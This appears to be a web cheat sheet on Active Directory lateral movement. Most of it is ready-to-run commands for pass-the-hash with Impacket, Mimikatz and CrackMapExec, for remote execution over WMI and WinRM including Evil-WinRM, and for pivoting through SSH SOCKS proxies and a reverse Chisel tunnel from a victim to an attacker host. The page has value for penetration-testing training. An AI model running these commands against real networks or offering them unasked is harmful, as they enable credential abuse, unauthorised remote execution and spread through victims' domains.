Lateral Movement Techniques

After compromising an initial host, lateral movement allows attackers to spread through the network, find valuable targets, and ultimately reach domain controllers or critical assets.

Pass-the-Hash (PtH)

# No password cracking needed—use the NTLM hash directly!

# Using Impacket
psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 [email protected]

# Using Mimikatz
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:powershell

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0

WMI Execution

# WMI remote command execution
wmic /node:192.168.1.10 /user:CORP\admin /password:Pass123 process call create "cmd.exe /c whoami > C:\output.txt"

# Using Impacket
wmiexec.py CORP/admin:[email protected]

# PowerShell WMI
Invoke-WmiMethod -ComputerName DC01 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe -enc BASE64"

PSRemoting / WinRM

# Enable PSRemoting session
Enter-PSSession -ComputerName DC01 -Credential CORP\admin

# Execute command remotely
Invoke-Command -ComputerName DC01,DC02 -ScriptBlock { whoami; hostname }

# Using Evil-WinRM
evil-winrm -i 192.168.1.10 -u admin -p Pass123

# SSH Dynamic Port Forwarding (SOCKS proxy)
ssh -D 9050 user@compromised-host

# Chisel (fast TCP tunnel)
# On attacker: chisel server -p 8080 --reverse
# On victim: chisel client attacker:8080 R:socks

# Proxychains usage
proxychains nmap -sT 10.10.10.0/24

Frequently Asked Questions

Master Active Directory attacks.
AD Security Guide